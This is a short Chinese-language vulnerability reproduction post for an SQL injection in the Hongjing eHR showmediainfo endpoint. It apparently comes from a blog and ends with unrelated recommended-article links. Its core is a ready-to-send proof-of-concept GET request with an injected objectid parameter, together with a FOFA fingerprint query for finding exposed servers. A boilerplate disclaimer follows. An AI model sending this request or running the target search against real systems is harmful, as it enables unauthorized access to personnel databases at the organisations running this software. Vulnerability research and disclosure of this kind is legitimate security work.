【漏洞复现】宏景eHR showmediainfo SQL注入漏洞

0x01 产品简介

北京宏景世纪软件股份有限公司(简称"宏景软件")专注于国有企事业单位人力与人才管理数智化(数字化、智能化)产品的研发和应用推广。

0x02 漏洞概述

宏景eHR /workbench/duty/showmediainfo接口存在SQL注入漏洞,攻击者可以通过该漏洞构造sql语句获取数据库信息。

0x03 测绘语句

复制代码
宏景eHR

0x04 漏洞复现

复制代码
GET /workbench/duty/showmediainfo?kind=0&usernumber=1MV8sCtnMcsZFzLhJXUMPAATTP2HJFPAATTPVIRoUrFdir1XVNthrak35kPAATTP3HJDPAATTP&planid=1&objectid=1' HTTP/1.1

0x05 影响范围

复制代码
fofa: app="HJSOFT-HCM"

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
GUIQU.25 分钟前
【Oracle】DCL语言
数据库·oracle
不剪发的Tony老师4 小时前
sqlite-vec:谁说SQLite不是向量数据库?
数据库·人工智能·sqlite
abcnull4 小时前
springboot配置mybatis debug的sql日志输出
spring boot·sql·mybatis
敲键盘的小夜猫5 小时前
Milvus向量Search查询综合案例实战(下)
数据库·python·milvus
钢铁男儿6 小时前
深入剖析C#构造函数执行:基类调用、初始化顺序与访问控制
java·数据库·c#
有时间要学习6 小时前
MySQL——事务
数据库·mysql
翻滚吧键盘6 小时前
Spring Boot,注解,@ComponentScan
java·数据库·spring boot
not coder6 小时前
Pytest Fixture 详解
数据库·pytest
小光学长7 小时前
基于vue框架的独居老人上门护理小程序的设计r322q(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库
weixin_472339467 小时前
MySQL优化全链路实践:从慢查询治理到架构升级
数据库·mysql·架构